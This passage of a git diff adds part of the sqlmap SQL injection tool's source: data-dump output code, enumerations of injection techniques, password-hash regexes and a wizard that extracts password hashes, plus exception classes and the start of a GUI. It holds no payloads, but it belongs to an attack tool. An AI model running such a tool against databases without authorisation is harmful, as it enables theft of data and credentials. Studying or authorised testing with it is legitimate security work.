1 + fields = len(tableValues) - 1 + + columns = prioritySortColumns(list(tableValues.keys())) + + if conf.col: + cols = conf.col.split(',') + columns = sorted(columns, key=lambda _: cols.index(_) if _ in cols else 0) + + for column in columns: + if column != "__infos__": + info = tableValues[column] + lines = "-" * (int(info["length"]) + 2) + separator += "+%s" % lines + + separator += "+" + self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else "", unsafeSQLIdentificatorNaming(table))) + + if conf.dumpFormat == DUMP_FORMAT.SQLITE: + cols = [] + + for column in columns: + if column != "__infos__": + colType = Replication.INTEGER + + for value in tableValues[column]['values']: + try: + if not value or value == " ": # NULL + continue + + int(value) + except ValueError: + colType = None + break + + if colType is None: + colType = Replication.REAL + + for value in tableValues[column]['values']: + try: + if not value or value == " ": # NULL + continue + + float(value) + except ValueError: + colType = None + break + + cols.append((unsafeSQLIdentificatorNaming(column), colType if colType else Replication.TEXT)) + + rtable = replication.createTable(table, cols) + elif conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "\n\n\n") + dataToDumpFile(dumpFP, "\n" % UNICODE_ENCODING) + dataToDumpFile(dumpFP, "\n" % VERSION_STRING) + dataToDumpFile(dumpFP, "%s\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table))) + dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE) + dataToDumpFile(dumpFP, "\n\n\n\n\n\n") + + if count == 1: + self._write("[1 entry]") + else: + self._write("[%d entries]" % count) + + self._write(separator) + + for column in columns: + if column != "__infos__": + info = tableValues[column] + + column = unsafeSQLIdentificatorNaming(column) + maxlength = int(info["length"]) + blank = " " * (maxlength - getConsoleLength(column)) + + self._write("| %s%s" % (column, blank), newline=False) + + if not appendToFile: + if conf.dumpFormat == DUMP_FORMAT.CSV: + if field == fields: + dataToDumpFile(dumpFP, "%s" % safeCSValue(column)) + else: + dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel)) + elif conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "" % getUnicode(htmlEscape(column).encode("ascii", "xmlcharrefreplace"))) + + field += 1 + + if conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "\n\n\n\n") + + self._write("|\n%s" % separator) + + if conf.dumpFormat == DUMP_FORMAT.CSV: + dataToDumpFile(dumpFP, "\n" if not appendToFile else "") + + elif conf.dumpFormat == DUMP_FORMAT.SQLITE: + rtable.beginTransaction() + + if count > TRIM_STDOUT_DUMP_SIZE: + warnMsg = "console output will be trimmed to " + warnMsg += "last %d rows due to " % TRIM_STDOUT_DUMP_SIZE + warnMsg += "large table size" + logger.warning(warnMsg) + + for i in xrange(count): + console = (i >= count - TRIM_STDOUT_DUMP_SIZE) + field = 1 + values = [] + + if conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "") + + for column in columns: + if column != "__infos__": + info = tableValues[column] + + if len(info["values"]) <= i: + continue + + if info["values"][i] is None: + value = u'' + else: + value = getUnicode(info["values"][i]) + value = DUMP_REPLACEMENTS.get(value, value) + + values.append(value) + maxlength = int(info["length"]) + blank = " " * (maxlength - getConsoleLength(value)) + self._write("| %s%s" % (value, blank), newline=False, console=console) + + if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value: + try: + mimetype = getText(magic.from_buffer(value, mime=True)) + if any(mimetype.startswith(_) for _ in ("application", "image")): + if not os.path.isdir(dumpDbPath): + os.makedirs(dumpDbPath) + + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column))) + filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) + warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) + logger.warning(warnMsg) + + with openFile(filepath, "w+b", None) as f: + _ = safechardecode(value, True) + f.write(_) + + except Exception as ex: + logger.debug(getSafeExString(ex)) + + if conf.dumpFormat == DUMP_FORMAT.CSV: + if field == fields: + dataToDumpFile(dumpFP, "%s" % safeCSValue(value)) + else: + dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel)) + elif conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "" % getUnicode(htmlEscape(value).encode("ascii", "xmlcharrefreplace"))) + + field += 1 + + if conf.dumpFormat == DUMP_FORMAT.SQLITE: + try: + rtable.insert(values) + except SqlmapValueException: + pass + elif conf.dumpFormat == DUMP_FORMAT.CSV: + dataToDumpFile(dumpFP, "\n") + elif conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "\n") + + self._write("|", console=console) + + self._write("%s\n" % separator) + + if conf.dumpFormat == DUMP_FORMAT.SQLITE: + rtable.endTransaction() + logger.info("table '%s.%s' dumped to SQLITE database '%s'" % (db, table, replication.dbpath)) + + elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): + if conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "\n
%s
%s
\n\n") + else: + dataToDumpFile(dumpFP, "\n") + dumpFP.close() + + msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName) + if not warnFile: + logger.info(msg) + else: + logger.warning(msg) + + def dbColumns(self, dbColumnsDict, colConsider, dbs): + if conf.api: + self._write(dbColumnsDict, content_type=CONTENT_TYPE.COLUMNS) + + for column in dbColumnsDict.keys(): + if colConsider == "1": + colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column) + else: + colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column) + + found = {} + for db, tblData in dbs.items(): + for tbl, colData in tblData.items(): + for col, dataType in colData.items(): + if column.lower() in col.lower(): + if db in found: + if tbl in found[db]: + found[db][tbl][col] = dataType + else: + found[db][tbl] = {col: dataType} + else: + found[db] = {} + found[db][tbl] = {col: dataType} + + continue + + if found: + msg = "column%s found in the " % colConsiderStr + msg += "following databases:" + self._write(msg) + + self.dbTableColumns(found) + + def sqlQuery(self, query, queryRes): + self.string(query, queryRes, content_type=CONTENT_TYPE.SQL_QUERY) + + def rFile(self, fileData): + self.lister("files saved to", fileData, sort=False, content_type=CONTENT_TYPE.FILE_READ) + + def registerValue(self, registerData): + self.string("Registry key value data", registerData, content_type=CONTENT_TYPE.REG_READ, sort=False) + +# object to manage how to print the retrieved queries output to +# standard output and sessions file +dumper = Dump() diff --git a/src/sqlmap-master/lib/core/enums.py b/src/sqlmap-master/lib/core/enums.py new file mode 100644 index 0000000..54d4177 --- /dev/null +++ b/src/sqlmap-master/lib/core/enums.py @@ -0,0 +1,500 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +class PRIORITY(object): + LOWEST = -100 + LOWER = -50 + LOW = -10 + NORMAL = 0 + HIGH = 10 + HIGHER = 50 + HIGHEST = 100 + +class SORT_ORDER(object): + FIRST = 0 + SECOND = 1 + THIRD = 2 + FOURTH = 3 + FIFTH = 4 + LAST = 100 + +# Reference: https://docs.python.org/2/library/logging.html#logging-levels +class LOGGING_LEVELS(object): + NOTSET = 0 + DEBUG = 10 + INFO = 20 + WARNING = 30 + ERROR = 40 + CRITICAL = 50 + +class DBMS(object): + ACCESS = "Microsoft Access" + DB2 = "IBM DB2" + FIREBIRD = "Firebird" + MAXDB = "SAP MaxDB" + MSSQL = "Microsoft SQL Server" + MYSQL = "MySQL" + ORACLE = "Oracle" + PGSQL = "PostgreSQL" + SQLITE = "SQLite" + SYBASE = "Sybase" + INFORMIX = "Informix" + HSQLDB = "HSQLDB" + H2 = "H2" + MONETDB = "MonetDB" + DERBY = "Apache Derby" + VERTICA = "Vertica" + MCKOI = "Mckoi" + PRESTO = "Presto" + ALTIBASE = "Altibase" + MIMERSQL = "MimerSQL" + CLICKHOUSE = "ClickHouse" + CRATEDB = "CrateDB" + CUBRID = "Cubrid" + CACHE = "InterSystems Cache" + EXTREMEDB = "eXtremeDB" + FRONTBASE = "FrontBase" + RAIMA = "Raima Database Manager" + VIRTUOSO = "Virtuoso" + +class DBMS_DIRECTORY_NAME(object): + ACCESS = "access" + DB2 = "db2" + FIREBIRD = "firebird" + MAXDB = "maxdb" + MSSQL = "mssqlserver" + MYSQL = "mysql" + ORACLE = "oracle" + PGSQL = "postgresql" + SQLITE = "sqlite" + SYBASE = "sybase" + HSQLDB = "hsqldb" + H2 = "h2" + INFORMIX = "informix" + MONETDB = "monetdb" + DERBY = "derby" + VERTICA = "vertica" + MCKOI = "mckoi" + PRESTO = "presto" + ALTIBASE = "altibase" + MIMERSQL = "mimersql" + CLICKHOUSE = "clickhouse" + CRATEDB = "cratedb" + CUBRID = "cubrid" + CACHE = "cache" + EXTREMEDB = "extremedb" + FRONTBASE = "frontbase" + RAIMA = "raima" + VIRTUOSO = "virtuoso" + +class FORK(object): + MARIADB = "MariaDB" + MEMSQL = "MemSQL" + PERCONA = "Percona" + COCKROACHDB = "CockroachDB" + TIDB = "TiDB" + REDSHIFT = "Amazon Redshift" + GREENPLUM = "Greenplum" + DRIZZLE = "Drizzle" + IGNITE = "Apache Ignite" + AURORA = "Aurora" + ENTERPRISEDB = "EnterpriseDB" + YELLOWBRICK = "Yellowbrick" + IRIS = "Iris" + YUGABYTEDB = "YugabyteDB" + OPENGAUSS = "OpenGauss" + +class CUSTOM_LOGGING(object): + PAYLOAD = 9 + TRAFFIC_OUT = 8 + TRAFFIC_IN = 7 + +class OS(object): + LINUX = "Linux" + WINDOWS = "Windows" + +class PLACE(object): + GET = "GET" + POST = "POST" + URI = "URI" + COOKIE = "Cookie" + USER_AGENT = "User-Agent" + REFERER = "Referer" + HOST = "Host" + CUSTOM_POST = "(custom) POST" + CUSTOM_HEADER = "(custom) HEADER" + +class POST_HINT(object): + SOAP = "SOAP" + JSON = "JSON" + JSON_LIKE = "JSON-like" + MULTIPART = "MULTIPART" + XML = "XML (generic)" + ARRAY_LIKE = "Array-like" + +class HTTPMETHOD(object): + GET = "GET" + POST = "POST" + HEAD = "HEAD" + PUT = "PUT" + DELETE = "DELETE" + TRACE = "TRACE" + OPTIONS = "OPTIONS" + CONNECT = "CONNECT" + PATCH = "PATCH" + +class NULLCONNECTION(object): + HEAD = "HEAD" + RANGE = "Range" + SKIP_READ = "skip-read" + +class REFLECTIVE_COUNTER(object): + MISS = "MISS" + HIT = "HIT" + +class CHARSET_TYPE(object): + BINARY = 1 + DIGITS = 2 + HEXADECIMAL = 3 + ALPHA = 4 + ALPHANUM = 5 + +class HEURISTIC_TEST(object): + CASTED = 1 + NEGATIVE = 2 + POSITIVE = 3 + +class HASH(object): + MYSQL = r'(?i)\A\*[0-9a-f]{40}\Z' + MYSQL_OLD = r'(?i)\A(?![0-9]+\Z)[0-9a-f]{16}\Z' + POSTGRES = r'(?i)\Amd5[0-9a-f]{32}\Z' + MSSQL = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{40}\Z' + MSSQL_OLD = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{80}\Z' + MSSQL_NEW = r'(?i)\A0x0200[0-9a-f]{8}[0-9a-f]{128}\Z' + ORACLE = r'(?i)\As:[0-9a-f]{60}\Z' + ORACLE_OLD = r'(?i)\A[0-9a-f]{16}\Z' + MD5_GENERIC = r'(?i)\A(0x)?[0-9a-f]{32}\Z' + SHA1_GENERIC = r'(?i)\A(0x)?[0-9a-f]{40}\Z' + SHA224_GENERIC = r'(?i)\A[0-9a-f]{56}\Z' + SHA256_GENERIC = r'(?i)\A(0x)?[0-9a-f]{64}\Z' + SHA384_GENERIC = r'(?i)\A[0-9a-f]{96}\Z' + SHA512_GENERIC = r'(?i)\A(0x)?[0-9a-f]{128}\Z' + CRYPT_GENERIC = r'\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z' + JOOMLA = r'\A[0-9a-f]{32}:\w{32}\Z' + PHPASS = r'\A\$[PHQS]\$[./0-9a-zA-Z]{31}\Z' + APACHE_MD5_CRYPT = r'\A\$apr1\$.{1,8}\$[./a-zA-Z0-9]+\Z' + UNIX_MD5_CRYPT = r'\A\$1\$.{1,8}\$[./a-zA-Z0-9]+\Z' + APACHE_SHA1 = r'\A\{SHA\}[a-zA-Z0-9+/]+={0,2}\Z' + VBULLETIN = r'\A[0-9a-fA-F]{32}:.{30}\Z' + VBULLETIN_OLD = r'\A[0-9a-fA-F]{32}:.{3}\Z' + SSHA = r'\A\{SSHA\}[a-zA-Z0-9+/]+={0,2}\Z' + SSHA256 = r'\A\{SSHA256\}[a-zA-Z0-9+/]+={0,2}\Z' + SSHA512 = r'\A\{SSHA512\}[a-zA-Z0-9+/]+={0,2}\Z' + DJANGO_MD5 = r'\Amd5\$[^$]+\$[0-9a-f]{32}\Z' + DJANGO_SHA1 = r'\Asha1\$[^$]+\$[0-9a-f]{40}\Z' + MD5_BASE64 = r'\A[a-zA-Z0-9+/]{22}==\Z' + SHA1_BASE64 = r'\A[a-zA-Z0-9+/]{27}=\Z' + SHA256_BASE64 = r'\A[a-zA-Z0-9+/]{43}=\Z' + SHA512_BASE64 = r'\A[a-zA-Z0-9+/]{86}==\Z' + +# Reference: http://www.zytrax.com/tech/web/mobile_ids.html +class MOBILES(object): + BLACKBERRY = ("BlackBerry Z10", "Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.3.2205 Mobile Safari/537.35+") + GALAXY = ("Samsung Galaxy S8", "Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW; en-us) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36 Puffin/9.0.0.50263AP") + HP = ("HP iPAQ 6365", "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; HP iPAQ h6300)") + HTC = ("HTC 10", "Mozilla/5.0 (Linux; Android 8.0.0; HTC 10 Build/OPR1.170623.027) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36") + HUAWEI = ("Huawei P8", "Mozilla/5.0 (Linux; Android 4.4.4; HUAWEI H891L Build/HuaweiH891L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36") + IPHONE = ("Apple iPhone 8", "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1") + LUMIA = ("Microsoft Lumia 950", "Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 950) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Mobile Safari/537.36 Edge/15.15063") + NEXUS = ("Google Nexus 7", "Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19") + NOKIA = ("Nokia N97", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344") + PIXEL = ("Google Pixel", "Mozilla/5.0 (Linux; Android 10; Pixel) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.117 Mobile Safari/537.36") + XIAOMI = ("Xiaomi Mi 8 Pro", "Mozilla/5.0 (Linux; Android 9; MI 8 Pro Build/PKQ1.180729.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/87.0.4280.66 Mobile Safari/537.36") + +class PROXY_TYPE(object): + HTTP = "HTTP" + HTTPS = "HTTPS" + SOCKS4 = "SOCKS4" + SOCKS5 = "SOCKS5" + +class REGISTRY_OPERATION(object): + READ = "read" + ADD = "add" + DELETE = "delete" + +class DUMP_FORMAT(object): + CSV = "CSV" + HTML = "HTML" + SQLITE = "SQLITE" + +class HTTP_HEADER(object): + ACCEPT = "Accept" + ACCEPT_CHARSET = "Accept-Charset" + ACCEPT_ENCODING = "Accept-Encoding" + ACCEPT_LANGUAGE = "Accept-Language" + AUTHORIZATION = "Authorization" + CACHE_CONTROL = "Cache-Control" + CONNECTION = "Connection" + CONTENT_ENCODING = "Content-Encoding" + CONTENT_LENGTH = "Content-Length" + CONTENT_RANGE = "Content-Range" + CONTENT_TYPE = "Content-Type" + COOKIE = "Cookie" + EXPIRES = "Expires" + HOST = "Host" + IF_MODIFIED_SINCE = "If-Modified-Since" + IF_NONE_MATCH = "If-None-Match" + LAST_MODIFIED = "Last-Modified" + LOCATION = "Location" + PRAGMA = "Pragma" + PROXY_AUTHORIZATION = "Proxy-Authorization" + PROXY_CONNECTION = "Proxy-Connection" + RANGE = "Range" + REFERER = "Referer" + REFRESH = "Refresh" # Reference: http://stackoverflow.com/a/283794 + SERVER = "Server" + SET_COOKIE = "Set-Cookie" + TRANSFER_ENCODING = "Transfer-Encoding" + URI = "URI" + USER_AGENT = "User-Agent" + VIA = "Via" + X_POWERED_BY = "X-Powered-By" + X_DATA_ORIGIN = "X-Data-Origin" + +class EXPECTED(object): + BOOL = "bool" + INT = "int" + +class OPTION_TYPE(object): + BOOLEAN = "boolean" + INTEGER = "integer" + FLOAT = "float" + STRING = "string" + +class HASHDB_KEYS(object): + DBMS = "DBMS" + DBMS_FORK = "DBMS_FORK" + CHECK_WAF_RESULT = "CHECK_WAF_RESULT" + CHECK_NULL_CONNECTION_RESULT = "CHECK_NULL_CONNECTION_RESULT" + CONF_TMP_PATH = "CONF_TMP_PATH" + KB_ABS_FILE_PATHS = "KB_ABS_FILE_PATHS" + KB_BRUTE_COLUMNS = "KB_BRUTE_COLUMNS" + KB_BRUTE_TABLES = "KB_BRUTE_TABLES" + KB_CHARS = "KB_CHARS" + KB_DYNAMIC_MARKINGS = "KB_DYNAMIC_MARKINGS" + KB_INJECTIONS = "KB_INJECTIONS" + KB_ERROR_CHUNK_LENGTH = "KB_ERROR_CHUNK_LENGTH" + KB_XP_CMDSHELL_AVAILABLE = "KB_XP_CMDSHELL_AVAILABLE" + OS = "OS" + +class REDIRECTION(object): + YES = 'Y' + NO = 'N' + +class PAYLOAD(object): + SQLINJECTION = { + 1: "boolean-based blind", + 2: "error-based", + 3: "inline query", + 4: "stacked queries", + 5: "time-based blind", + 6: "UNION query", + } + + PARAMETER = { + 1: "Unescaped numeric", + 2: "Single quoted string", + 3: "LIKE single quoted string", + 4: "Double quoted string", + 5: "LIKE double quoted string", + 6: "Identifier (e.g. column name)", + } + + RISK = { + 0: "No risk", + 1: "Low risk", + 2: "Medium risk", + 3: "High risk", + } + + CLAUSE = { + 0: "Always", + 1: "WHERE", + 2: "GROUP BY", + 3: "ORDER BY", + 4: "LIMIT", + 5: "OFFSET", + 6: "TOP", + 7: "Table name", + 8: "Column name", + 9: "Pre-WHERE (non-query)", + } + + class METHOD(object): + COMPARISON = "comparison" + GREP = "grep" + TIME = "time" + UNION = "union" + + class TECHNIQUE(object): + BOOLEAN = 1 + ERROR = 2 + QUERY = 3 + STACKED = 4 + TIME = 5 + UNION = 6 + + class WHERE(object): + ORIGINAL = 1 + NEGATIVE = 2 + REPLACE = 3 + +class WIZARD(object): + BASIC = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba") + INTERMEDIATE = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getUsers", "getDbs", "getTables", "getSchema", "excludeSysDbs") + ALL = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getHostname", "getUsers", "getPasswordHashes", "getPrivileges", "getRoles", "dumpAll") + +class ADJUST_TIME_DELAY(object): + DISABLE = -1 + NO = 0 + YES = 1 + +class WEB_PLATFORM(object): + PHP = "php" + ASP = "asp" + ASPX = "aspx" + JSP = "jsp" + +class CONTENT_TYPE(object): + TARGET = 0 + TECHNIQUES = 1 + DBMS_FINGERPRINT = 2 + BANNER = 3 + CURRENT_USER = 4 + CURRENT_DB = 5 + HOSTNAME = 6 + IS_DBA = 7 + USERS = 8 + PASSWORDS = 9 + PRIVILEGES = 10 + ROLES = 11 + DBS = 12 + TABLES = 13 + COLUMNS = 14 + SCHEMA = 15 + COUNT = 16 + DUMP_TABLE = 17 + SEARCH = 18 + SQL_QUERY = 19 + COMMON_TABLES = 20 + COMMON_COLUMNS = 21 + FILE_READ = 22 + FILE_WRITE = 23 + OS_CMD = 24 + REG_READ = 25 + STATEMENTS = 26 + +class CONTENT_STATUS(object): + IN_PROGRESS = 0 + COMPLETE = 1 + +class AUTH_TYPE(object): + BASIC = "basic" + DIGEST = "digest" + BEARER = "bearer" + NTLM = "ntlm" + PKI = "pki" + +class AUTOCOMPLETE_TYPE(object): + SQL = 0 + OS = 1 + SQLMAP = 2 + API = 3 + +class NOTE(object): + FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable" + +class MKSTEMP_PREFIX(object): + HASHES = "sqlmaphashes-" + CRAWLER = "sqlmapcrawler-" + IPC = "sqlmapipc-" + CONFIG = "sqlmapconfig-" + TESTING = "sqlmaptesting-" + RESULTS = "sqlmapresults-" + COOKIE_JAR = "sqlmapcookiejar-" + BIG_ARRAY = "sqlmapbigarray-" + SPECIFIC_RESPONSE = "sqlmapresponse-" + PREPROCESS = "sqlmappreprocess-" + +class TIMEOUT_STATE(object): + NORMAL = 0 + EXCEPTION = 1 + TIMEOUT = 2 + +class HINT(object): + PREPEND = 0 + APPEND = 1 + +class FUZZ_UNION_COLUMN: + STRING = "" + INTEGER = "" + NULL = "NULL" + +class COLOR: + BLUE = "\033[34m" + BOLD_MAGENTA = "\033[35;1m" + BOLD_GREEN = "\033[32;1m" + BOLD_LIGHT_MAGENTA = "\033[95;1m" + LIGHT_GRAY = "\033[37m" + BOLD_RED = "\033[31;1m" + BOLD_LIGHT_GRAY = "\033[37;1m" + YELLOW = "\033[33m" + DARK_GRAY = "\033[90m" + BOLD_CYAN = "\033[36;1m" + LIGHT_RED = "\033[91m" + CYAN = "\033[36m" + MAGENTA = "\033[35m" + LIGHT_MAGENTA = "\033[95m" + LIGHT_GREEN = "\033[92m" + RESET = "\033[0m" + BOLD_DARK_GRAY = "\033[90;1m" + BOLD_LIGHT_YELLOW = "\033[93;1m" + BOLD_LIGHT_RED = "\033[91;1m" + BOLD_LIGHT_GREEN = "\033[92;1m" + LIGHT_YELLOW = "\033[93m" + BOLD_LIGHT_BLUE = "\033[94;1m" + BOLD_LIGHT_CYAN = "\033[96;1m" + LIGHT_BLUE = "\033[94m" + BOLD_WHITE = "\033[97;1m" + LIGHT_CYAN = "\033[96m" + BLACK = "\033[30m" + BOLD_YELLOW = "\033[33;1m" + BOLD_BLUE = "\033[34;1m" + GREEN = "\033[32m" + WHITE = "\033[97m" + BOLD_BLACK = "\033[30;1m" + RED = "\033[31m" + UNDERLINE = "\033[4m" + +class BACKGROUND: + BLUE = "\033[44m" + LIGHT_GRAY = "\033[47m" + YELLOW = "\033[43m" + DARK_GRAY = "\033[100m" + LIGHT_RED = "\033[101m" + CYAN = "\033[46m" + MAGENTA = "\033[45m" + LIGHT_MAGENTA = "\033[105m" + LIGHT_GREEN = "\033[102m" + RESET = "\033[0m" + LIGHT_YELLOW = "\033[103m" + LIGHT_BLUE = "\033[104m" + LIGHT_CYAN = "\033[106m" + BLACK = "\033[40m" + GREEN = "\033[42m" + WHITE = "\033[107m" + RED = "\033[41m" diff --git a/src/sqlmap-master/lib/core/exception.py b/src/sqlmap-master/lib/core/exception.py new file mode 100644 index 0000000..f923705 --- /dev/null +++ b/src/sqlmap-master/lib/core/exception.py @@ -0,0 +1,78 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +class SqlmapBaseException(Exception): + pass + +class SqlmapCompressionException(SqlmapBaseException): + pass + +class SqlmapConnectionException(SqlmapBaseException): + pass + +class SqlmapDataException(SqlmapBaseException): + pass + +class SqlmapFilePathException(SqlmapBaseException): + pass + +class SqlmapGenericException(SqlmapBaseException): + pass + +class SqlmapInstallationException(SqlmapBaseException): + pass + +class SqlmapMissingDependence(SqlmapBaseException): + pass + +class SqlmapMissingMandatoryOptionException(SqlmapBaseException): + pass + +class SqlmapMissingPrivileges(SqlmapBaseException): + pass + +class SqlmapNoneDataException(SqlmapBaseException): + pass + +class SqlmapNotVulnerableException(SqlmapBaseException): + pass + +class SqlmapSilentQuitException(SqlmapBaseException): + pass + +class SqlmapUserQuitException(SqlmapBaseException): + pass + +class SqlmapShellQuitException(SqlmapBaseException): + pass + +class SqlmapSkipTargetException(SqlmapBaseException): + pass + +class SqlmapSyntaxException(SqlmapBaseException): + pass + +class SqlmapSystemException(SqlmapBaseException): + pass + +class SqlmapThreadException(SqlmapBaseException): + pass + +class SqlmapTokenException(SqlmapBaseException): + pass + +class SqlmapUndefinedMethod(SqlmapBaseException): + pass + +class SqlmapUnsupportedDBMSException(SqlmapBaseException): + pass + +class SqlmapUnsupportedFeatureException(SqlmapBaseException): + pass + +class SqlmapValueException(SqlmapBaseException): + pass diff --git a/src/sqlmap-master/lib/core/gui.py b/src/sqlmap-master/lib/core/gui.py new file mode 100644 index 0000000..00f98ee --- /dev/null +++ b/src/sqlmap-master/lib/core/gui.py @@ -0,0 +1,284 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import os +import re +import socket +import subprocess +import sys +import tempfile +import threading +import webbrowser + +from lib.core.common import getSafeExString +from lib.core.common import saveConfig +from lib.core.data import paths +from lib.core.defaults import defaults +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapMissingDependence +from lib.core.exception import SqlmapSystemException +from lib.core.settings import DEV_EMAIL_ADDRESS +from lib.core.settings import IS_WIN +from lib.core.settings import ISSUES_PAGE +from lib.core.settings import GIT_PAGE +from lib.core.settings import SITE +from lib.core.settings import VERSION_STRING +from lib.core.settings import WIKI_PAGE +from thirdparty.six.moves import queue as _queue + +alive = None +line = "" +process = None +queue = None + +def runGui(parser): + try: + from thirdparty.six.moves import tkinter as _tkinter + from thirdparty.six.moves import tkinter_scrolledtext as _tkinter_scrolledtext + from thirdparty.six.moves import tkinter_ttk as _tkinter_ttk + from thirdparty.six.moves import tkinter_messagebox as _tkinter_messagebox + except ImportError as ex: + raise SqlmapMissingDependence("missing dependence ('%s')" % getSafeExString(ex)) + + # Reference: https://www.reddit.com/r/learnpython/comments/985umy/limit_user_input_to_only_int_with_tkinter/e4dj9k9?utm_source=share&utm_medium=web2x + class ConstrainedEntry(_tkinter.Entry): + def __init__(self, master=None, **kwargs): + self.var = _tkinter.StringVar() + self.regex = kwargs["regex"] + del kwargs["regex"] + _tkinter.Entry.__init__(self, master, textvariable=self.var, **kwargs) + self.old_value = '' + self.var.trace('w', self.check) + self.get, self.set = self.var.get, self.var.set + + def check(self, *args): + if re.search(self.regex, self.get()): + self.old_value = self.get() + else: + self.set(self.old_value) + + # Reference: https://code.activestate.com/recipes/580726-tkinter-notebook-that-fits-to-the-height-of-every-/ + class AutoresizableNotebook(_tkinter_ttk.Notebook): + def __init__(self, master=None, **kw): + _tkinter_ttk.Notebook.__init__(self, master, **kw) + self.bind("<>", self._on_tab_changed) + + def _on_tab_changed(self, event): + event.widget.update_idletasks() + + tab = event.widget.nametowidget(event.widget.select()) + event.widget.configure(height=tab.winfo_reqheight()) + + try: + window = _tkinter.Tk() + except Exception as ex: + errMsg = "unable to create GUI window ('%s')" % getSafeExString(ex) + raise SqlmapSystemException(errMsg) + + window.title(VERSION_STRING) + + # Reference: https://www.holadevs.com/pregunta/64750/change-selected-tab-color-in-ttknotebook + style = _tkinter_ttk.Style() + settings = {"TNotebook.Tab": {"configure": {"padding": [5, 1], "background": "#fdd57e"}, "map": {"background": [("selected", "#C70039"), ("active", "#fc9292")], "foreground": [("selected", "#ffffff"), ("active", "#000000")]}}} + style.theme_create("custom", parent="alt", settings=settings) + style.theme_use("custom") + + # Reference: https://stackoverflow.com/a/10018670 + def center(window): + window.update_idletasks() + width = window.winfo_width() + frm_width = window.winfo_rootx() - window.winfo_x() + win_width = width + 2 * frm_width + height = window.winfo_height() + titlebar_height = window.winfo_rooty() - window.winfo_y() + win_height = height + titlebar_height + frm_width + x = window.winfo_screenwidth() // 2 - win_width // 2 + y = window.winfo_screenheight() // 2 - win_height // 2 + window.geometry('{}x{}+{}+{}'.format(width, height, x, y)) + window.deiconify() + + def onKeyPress(event): + global line + global queue + + if process: + if event.char == '\b': + line = line[:-1] + else: + line += event.char + + def onReturnPress(event): + global line + global queue + + if process: + try: + process.stdin.write(("%s\n" % line.strip()).encode()) + process.stdin.flush() + except socket.error: + line = "" + event.widget.master.master.destroy() + return "break" + except: + return + + event.widget.insert(_tkinter.END, "\n") + + return "break" + + def run(): + global alive + global process + global queue + + config = {} + + for key in window._widgets: + dest, type = key + widget = window._widgets[key] + + if hasattr(widget, "get") and not widget.get(): + value = None + elif type == "string": + value = widget.get() + elif type == "float": + value = float(widget.get()) + elif type == "int": + value = int(widget.get()) + else: + value = bool(widget.var.get()) + + config[dest] = value + + for option in parser.option_list: + config[option.dest] = defaults.get(option.dest, None) + + handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True) + os.close(handle) + + saveConfig(config, configFile) + + def enqueue(stream, queue): + global alive + + for line in iter(stream.readline, b''): + 